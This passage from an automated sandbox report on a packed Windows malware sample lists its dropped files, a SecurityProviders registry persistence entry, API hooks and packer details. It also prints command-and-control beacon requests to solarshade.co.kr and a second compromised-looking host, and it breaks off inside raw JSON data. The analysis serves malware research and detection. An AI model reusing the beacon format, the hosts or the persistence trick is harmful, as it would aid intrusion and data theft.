/eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=6906788\u0026sc=412dd86c4ba55fde5144cf03627da841\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nsource\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 10 of 25\n\nNetwork Traffic\r\nrelevance\r\n5/10\r\nInstallation/Persistance\r\nConnects to LPC ports\r\ndetails\r\n\"sysprep.exe\" connecting to \"\\ThemeApiPort\"\r\nsource\r\nAPI Call\r\nrelevance\r\n1/10\r\nDropped files\r\ndetails\r\n\"ud.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"\r\n\"diagerr.xml\" has type \"UTF-8 Unicode (with BOM) text with very long lines\"\r\n\"w7e2219.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"setuperr.log\" has type \"UTF-8 Unicode (with BOM) text with CRLF line terminators\"\r\n\"~13785.tmp\" has type \"HTML document ASCII text\"\r\n\"RecoveryStore.{B4365893-6E19-11E8-989D-0A00278A626A}.dat\" has type \"Composite Document\r\nFile V2 Document Cannot read section info\"\r\n\"desktop.ini\" has type \"empty\"\r\n\"{B4365894-6E19-11E8-989D-0A00278A626A}.dat\" has type \"Composite Document File V2\r\nDocument Cannot read section info\"\r\n\"~ER24B7.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"setupact.log\" has type \"UTF-8 Unicode (with BOM) text with CRLF line terminators\"\r\n\"~ER1AFA.tmp\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"\r\n\"diagwrn.xml\" has type \"UTF-8 Unicode (with BOM) text\"\r\nsource\r\nBinary File\r\nrelevance\r\n3/10\r\nModifies auto-execute functionality by setting/creating a value in the registry\r\ndetails\r\n\"sysprep.exe\" (Access type: \"SETVAL\"; Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\"; Key:\r\n\"SECURITYPROVIDERS\"; Value: \"credssp.dll, msimg64.dll\")\r\nsource\r\nRegistry Access\r\nrelevance\r\n8/10\r\nMonitors specific registry key for changes\r\ndetails\r\n\"takeown.exe\" monitors\r\n\"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4;\r\nSubtree: 0)\r\nsource\r\nAPI Call\r\nrelevance\r\n4/10\r\nOpens the MountPointManager (often used to detect additional infection locations)\r\ndetails\r\n\"iexplore.exe\" opened \"\\Device\\MountPointManager\"\r\n\"takeown.exe\" opened \"\\Device\\MountPointManager\"\r\nsource\r\nAPI Call\r\nrelevance\r\n5/10\r\nTouches files in the Windows directory\r\ndetails\r\n\"\u003cInput Sample\u003e\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\r\n\"~ER1AFA.tmp\" touched file \"C:\\Windows\\Globalization\\Sorting\\SortDefault.nls\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\System32\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 11 of 25\n\n\"explorer.exe\" touched file \"C:\\Windows\\System32\\sysprep\"\r\n\"explorer.exe\" touched file \"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Administrative Tools\\System Configuration.lnk\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\System32\\msconfig.exe\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\dcd5734867e97.customDestination\r\nms\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\cbc036d6fdb69fb5.customDestinat\r\nms\"\r\nsource\r\nAPI Call\r\nrelevance\r\n7/10\r\nNetwork Related\r\nFound potential URL in binary/memory\r\ndetails\r\nPattern match: \"http://schemas.microsoft.com/SMI/2005/WindowsSettings\"\r\nHeuristic match: \"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=3740962\u0026sc=b984cf5bcbf0f38f3d136d1f97103a91\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nHeuristic match: \"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=5265868\u0026sc=2e03e977aa881c76f7df783789a1e026\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nHeuristic match: \"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=6906788\u0026sc=412dd86c4ba55fde5144cf03627da841\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nHeuristic match: \"solarshade.co.kr\"\r\nPattern match: \"www.google.com\"\r\nPattern match: \"http://solarshade.co.kr/eml/goods_list_ok.php\"\r\nPattern match: \"http://lawbookcenter.co.kr/shop/temp/goods_list.php\"\r\nPattern match: \"http://%s\"\r\nsource\r\nFile/Memory\r\nrelevance\r\n10/10\r\nHTTP request contains Base64 encoded artifacts\r\ndetails\r\n\"o8q[qw_tu\"\r\n\"7{i\u003c_{M\"\r\n\"]w^^8q7nk5\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\n7/10\r\nUnusual Characteristics\r\nInstalls hooks/patches the running process\r\ndetails\r\n\"takeown.exe\" wrote bytes\r\n\"4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62de\r\nto virtual address \"0x76FE1000\" (part of module \"NSI.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9e89afcf8\" to virtual address \"0x7550E30C\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9b943f2f8\" to virtual address \"0x75523B9B\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9fda405f9\" to virtual address \"0x755F4731\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9652b03f9\" to virtual address \"0x7550ADF9\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e98b8e05f9\" to virtual address \"0x755F5DEE\" (part of module\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 12 of 25\n\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e937f20ef9\" to virtual address \"0x7555E963\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e99ac3c9f8\" to virtual address \"0x759B2694\" (part of module\r\n\"COMDLG32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e99d9af3f8\" to virtual address \"0x755F3E59\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e96ff10ef9\" to virtual address \"0x7555E9C9\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9ee7eeaf8\" to virtual address \"0x757A6143\" (part of module\r\n\"OLE32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9c20a10f9\" to virtual address \"0x7554D274\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9efb971fa\" to virtual address \"0x73F3388E\" (part of module\r\n\"COMCTL32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9e9f00ef9\" to virtual address \"0x7555E9ED\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e955a5f3f8\" to virtual address \"0x755F3EAE\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e99cf30ef9\" to virtual address \"0x7555E869\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e92e0d10f9\" to virtual address \"0x7554CF42\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9b296d2f8\" to virtual address \"0x757E9D0B\" (part of module\r\n\"OLE32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9fc7967fa\" to virtual address \"0x73FD7922\" (part of module\r\n\"COMCTL32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9b090f7f8\" to virtual address \"0x7550ABE1\" (part of module\r\n\"USER32.DLL\")\r\nsource\r\nHook Detection\r\nrelevance\r\n10/10\r\nMatched Compiler/Packer signature\r\ndetails\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" was detected as \"UPX v1.25 (Delphi) Stub\"\r\n\"w7e2219.tmp\" was detected as \"Visual C++ 2005 DLL -\u003e Microsoft\"\r\n\"~ER24B7.tmp\" was detected as \"Visual C++ 2005 DLL -\u003e Microsoft\"\r\n\"~ER1AFA.tmp\" was detected as \"VC8 -\u003e Microsoft Corporation\"\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nReads information about supported languages\r\ndetails\r\n\"sysprep.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key:\r\n\"00000409\")\r\nsource\r\nRegistry Access\r\nrelevance\r\n3/10\r\nFile Details\r\nAll Details:\r\nc9b65b764985dfd7a11d3faf599c56b8\r\nFile Sections\r\nDetails Name Entropy\r\nVirtual\r\nAddress\r\nVirtual\r\nSize\r\nRaw\r\nSize\r\nMD5\r\nName\r\nUPX0 0 0x1000 0x22d000 0x0 d41d8cd98f00b204e9800998ecf8\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 13 of 25\n\nDetails Name Entropy\r\nVirtual\r\nAddress\r\nVirtual\r\nSize\r\nRaw\r\nSize\r\nMD5\r\nUPX0\r\nEntropy\r\n0\r\nVirtual Address\r\n0x1000\r\nVirtual Size\r\n0x22d000\r\nRaw Size\r\n0x0\r\nMD5\r\nd41d8cd98f00b204e9800998ecf8427e\r\nName\r\nUPX1\r\nEntropy\r\n7.9309190833\r\nVirtual Address\r\n0x22e000\r\nVirtual Size\r\n0x4c000\r\nRaw Size\r\n0x4ba00\r\nMD5\r\nfafee9506c2cb7606718693156703f67\r\nUPX1 7.9309190833 0x22e000 0x4c000 0x4ba00 fafee9506c2cb760671869315670\r\nName\r\n.rsrc\r\nEntropy\r\n4.06720567587\r\nVirtual Address\r\n0x27a000\r\nVirtual Size\r\n0x1000\r\nRaw Size\r\n0x600\r\nMD5\r\n80e9f3854461573cdd5ef15498a07fd4\r\n.rsrc 4.06720567587 0x27a000 0x1000 0x600 80e9f3854461573cdd5ef15498a0\r\nFile Resources\r\nFile Imports\r\nADVAPI32.dll\r\nKERNEL32.DLL\r\nScreenshots\r\nHybrid Analysis\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 14 of 25\n\nTip: Click an analysed process below to view more details.\r\nAnalysed 10 processes in total.\r\n c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) 46/66\r\nNetwork Analysis\r\nDNS Requests\r\nHTTP Traffic\r\nSuricata Alerts\r\nET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.\r\nExtracted Files\r\nDisplaying 12 extracted file(s). The remaining 4 file(s) are available in the full version and XML/JSON reports.\r\nud.bat\r\ndesktop.ini\r\nFilepath\r\n%USERPROFILE%\\Desktop\\desktop.ini\r\nSize\r\nUnknown (0 bytes)\r\nType\r\nempty\r\nRuntime Process\r\niexplore.exe (PID: 2672)\r\nWarnings\r\nAdded comment to Virus Total report\r\nEnforcing malicious verdict, as a reliable source indicates high confidence\r\nNot all sources for indicator ID \"api-51\" are available in the report\r\nNot all sources for indicator ID \"api-55\" are available in the report\r\nNot all sources for indicator ID \"hooks-8\" are available in the report\r\nNot all sources for indicator ID \"mutant-0\" are available in the report\r\n{\"publicService\":true,\"flashFadeaway\":true,\"fadeawayTimeout\":15,\"autoLogout\":false,\"autoLogoutTimeout\":0,\"reCaptcha\":\"6LeJvv0SAAAAAG8IuH0l\r\nuT\",\"enableCookieBanner\":true,\"enableAdobeAnalytics\":true}\r\nHybrid Analysis requires that users undergo the Hybrid Analysis Vetting Process prior to obtaining an API key or\r\ndownloading malware samples. Please note that you must abide by the Hybrid Analysis Terms and Conditions and only use\r\nthese samples for research purposes. You are not permitted to share your user credentials or API key with anyone else.\r\nPlease notify Hybrid Analysis immediately if you believe that your API key or user credentials have been compromised.\r\n{\"id\":\"5b1f12537ca3e160de29d536\",\"sample_targets_streams_data\":{\"00013784-00002080-57436-107-009838E0\":\r\n{\"uid\":\"00013784-00002080-57436-107-009838E0\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":363},\"00013784-00002080-57436-145-\r\n00984D50\":{\"uid\":\"00013784-00002080-57436-145-\r\n00984D50\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":140},\"00013784-00002080-57436-160-00984830\":{\"uid\":\"00013784-00002080-\r\n57436-160-00984830\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":113},\"00013784-00002080-57436-186-\r\n00987960\":{\"uid\":\"00013784-00002080-57436-186-\r\n00987960\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":112},\"00013784-00002080-57436-108-009850A0\":{\"uid\":\"00013784-00002080-\r\n57436-108-009850A0\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":109},\"00013784-00002080-57436-133-\r\n00984A10\":{\"uid\":\"00013784-00002080-57436-133-\r\n00984A10\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":132},\"00013784-00002080-57436-16-00986896\":{\"uid\":\"00013784-00002080-\r\n57436-16-00986896\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 15 of 25\n\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":67},\"00013784-00002080-57436-17-\r\n009874D0\":{\"uid\":\"00013784-00002080-57436-17-\r\n009874D0\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":58},\"00013784-00002080-57436-198-0098A53C\":{\"uid\":\"00013784-00002080-\r\n57436-198-0098A53C\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":53},\"00013784-00002080-57436-183-\r\n0098A07C\":{\"uid\":\"00013784-00002080-57436-183-\r\n0098A07C\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":190},\"00013784-00002080-57436-171-00981050\":{\"uid\":\"00013784-00002080-\r\n57436-171-00981050\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":21},\"00013784-00002080-57436-14-\r\n00987550\":{\"uid\":\"00013784-00002080-57436-14-\r\n00987550\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":42},\"00013784-00002080-57436-9-009875CB\":{\"uid\":\"00013784-00002080-\r\n57436-9-009875CB\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":42},\"00013784-00002080-57436-59-\r\n009810A0\":{\"uid\":\"00013784-00002080-57436-59-\r\n009810A0\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":216},\"00013784-00002080-57436-1-009874C6\":{\"uid\":\"00013784-00002080-\r\n57436-1-009874C6\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":86},\"00013784-00002080-57436-11-\r\n009899FD\":{\"uid\":\"00013784-00002080-57436-11-\r\n009899FD\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":161},\"00013784-00002080-57436-13-0098C88C\":{\"uid\":\"00013784-00002080-\r\n57436-13-0098C88C\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":128},\"00013784-00002080-57436-314-\r\n0098D0F0\":{\"uid\":\"00013784-00002080-57436-314-\r\n0098D0F0\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":340},\"00013784-00002080-57436-208-0098B407\":{\"uid\":\"00013784-00002080-\r\n57436-208-0098B407\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":61},\"00013784-00002080-57436-280-\r\n00981000\":{\"uid\":\"00013784-00002080-57436-280-\r\n00981000\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":26},\"00013784-00002080-57436-455-009896B7\":{\"uid\":\"00013784-00002080-\r\n57436-455-009896B7\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":4},\"00013784-00002080-57436-91-\r\n0098D5F8\":{\"uid\":\"00013784-00002080-57436-91-\r\n0098D5F8\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":181},\"00013784-00002080-57436-324-0098CEA6\":{\"uid\":\"00013784-\r\n00002080-57436-324-0098CEA6\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":166},\"00013784-00002080-57436-32-\r\n009876B7\":{\"uid\":\"00013784-00002080-57436-32-\r\n009876B7\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":57},\"00013784-00002080-57436-36-0098B35B\":{\"uid\":\"00013784-00002080-\r\n57436-36-0098B35B\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":30},\"00013784-00002080-57436-197-\r\n0098A31C\":{\"uid\":\"00013784-00002080-57436-197-\r\n0098A31C\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":20},\"00013784-00002080-57436-60-00984C80\":{\"uid\":\"00013784-00002080-\r\n57436-60-00984C80\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":51},\"00013784-00002080-57436-37-\r\n0098D4DA\":{\"uid\":\"00013784-00002080-57436-37-\r\n0098D4DA\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":93},\"00013784-00002080-57436-42-0098B99D\":{\"uid\":\"00013784-00002080-\r\n57436-42-0098B99D\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":53},\"00013784-00002080-57436-6-\r\n00989749\":{\"uid\":\"00013784-00002080-57436-6-\r\n00989749\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":13},\"00013784-00002080-57436-301-0098956D\":{\"uid\":\"00013784-00002080-\r\n57436-301-0098956D\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":44},\"00013784-00002080-57436-150-\r\n00981A60\":{\"uid\":\"00013784-00002080-57436-150-\r\n00981A60\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":455},\"00013784-00002080-57436-335-0098AF7B\":{\"uid\":\"00013784-\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 16 of 25\n\n00002080-57436-335-0098AF7B\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-\r\n00002080\",\"root_target_uid\":\"00013602-00002084\",\"stream_type\":0,\"instructions\":162},\"00013784-00002080-57436-285-\r\n00985270\":{\"uid\":\"00013784-00002080-57436-285-\r\n00985270\",\"pid\":2080,\"name\":\"~ER1AFA.tmp\",\"child_target_uid\":\"00013784-00002080\",\"root_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":0,\"instructions\":33},\"62573-161-0040DF5E\":{\"uid\":\"62573-161-\r\n0040DF5E\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":2201},\"62573-107-004038E0\":{\"uid\":\"62573-107-\r\n004038E0\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":363},\"62573-2460-0046FC20\":{\"uid\":\"62573-2460-\r\n0046FC20\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":1041},\"62573-778-004F2E20\":{\"uid\":\"62573-778-\r\n004F2E20\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":1041},\"62573-5318-004CFFF3\":{\"uid\":\"62573-5318-\r\n004CFFF3\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":450},\"62573-721-004EE920\":{\"uid\":\"62573-721-\r\n004EE920\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":301},\"62573-2403-0046B720\":{\"uid\":\"62573-2403-\r\n0046B720\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":301},\"62573-11-004099FD\":{\"uid\":\"62573-11-\r\n004099FD\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":161},\"62573-190-00407960\":{\"uid\":\"62573-190-\r\n00407960\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":112},\"62573-3936-0040B407\":{\"uid\":\"62573-3936-\r\n0040B407\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":61},\"62573-4061-0040D0F0\":{\"uid\":\"62573-4061-\r\n0040D0F0\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":340},\"62573-13-0040C88C\":{\"uid\":\"62573-13-\r\n0040C88C\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":128},\"62573-4002-00403F60\":{\"uid\":\"62573-4002-\r\n00403F60\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":344},\"62573-4766-0049E874\":{\"uid\":\"62573-4766-\r\n0049E874\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":1135},\"62573-5269-004D0C20\":{\"uid\":\"62573-5269-\r\n004D0C20\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":1135},\"62573-1273-004B68B0\":{\"uid\":\"62573-1273-\r\n004B68B0\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":217},\"62573-2955-004336B0\":{\"uid\":\"62573-2955-\r\n004336B0\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":217},\"62573-4364-0044DA20\":{\"uid\":\"62573-4364-\r\n0044DA20\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":1135},\"62573-59-004010A0\":{\"uid\":\"62573-59-\r\n004010A0\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":216},\"62573-4413-0044CDF3\":{\"uid\":\"62573-4413-\r\n0044CDF3\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":450},\"62573-4815-0049DC47\":{\"uid\":\"62573-4815-\r\n0049DC47\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":450},\"62573-4482-004445AC\":{\"uid\":\"62573-4482-\r\n004445AC\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae27